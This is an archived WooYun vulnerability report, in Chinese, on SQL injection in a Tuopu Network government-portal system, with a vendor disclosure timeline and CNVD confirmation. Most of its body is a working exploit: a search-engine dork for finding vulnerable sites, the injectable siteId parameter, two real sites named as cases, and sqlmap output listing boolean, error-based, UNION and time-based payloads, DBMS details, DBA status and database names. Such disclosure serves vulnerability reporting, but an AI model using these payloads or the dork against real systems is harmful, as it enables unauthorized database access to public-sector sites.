乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-07: 细节已通知厂商并且等待厂商处理中 2014-05-10: 厂商已经确认,细节仅向厂商公开 2014-05-13: 细节向第三方安全合作伙伴开放 2014-07-04: 细节向核心白帽子及相关领域专家公开 2014-07-14: 细节向普通白帽子公开 2014-07-24: 细节向实习白帽子公开 2014-08-05: 细节向公众公开
5月有大事发生,来几发
拓普网络的通用政务系统,SQL注射漏洞谷歌关键词:inurl:search/list.php?siteId=
注射点:m/search/list.php?siteId=案例:http://www.cangshan.gov.cn/m/search/list.php?siteId=1
---Place: GETParameter: siteId Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: siteId=1 AND 3179=3179 Type: UNION query Title: MySQL UNION query (NULL) - 16 columns Payload: siteId=1 UNION ALL SELECT CONCAT(0x7176686a71,0x6b4f59765a564b62714c,0x7177696871),35,35,35,35,35,35,35,35,35,35,35,35,35,35,35# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: siteId=1 AND SLEEP(5)---[20:08:51] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.2.9, PHP 5.2.13back-end DBMS: MySQL 5.0.11
available databases [2]:[*] client_cangshan[*] information_schema
案例2:http://www.lypyxx.com/m/search/list.php?siteId=1
---Place: GETParameter: siteId Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: siteId=1 AND 2645=2645 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: siteId=1 AND (SELECT 5272 FROM(SELECT COUNT(*),CONCAT(0x71616c7171,(SELECT (CASE WHEN (5272=5272) THEN 1 ELSE 0 END)),0x7168627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 16 columns Payload: siteId=1 UNION ALL SELECT CONCAT(0x71616c7171,0x6c4767666c4575624157,0x7168627171),15,15,15,15,15,15,15,15,15,15,15,15,15,15,15# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: siteId=1 AND SLEEP(5)---[20:21:35] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.13back-end DBMS: MySQL 5.0
current user is DBA: True[20:22:20] [INFO] fetching database namesavailable databases [4]:[*] information_schema[*] lypyxx[*] mysql[*] test
如上
对问题参数加强过滤。
危害等级:高
漏洞Rank:14
确认时间:2014-05-10 22:12
CNVD确认并复现所述情况。由CNVD通过公开联系渠道向临沂市拓普网络股份有限公司通报。
暂无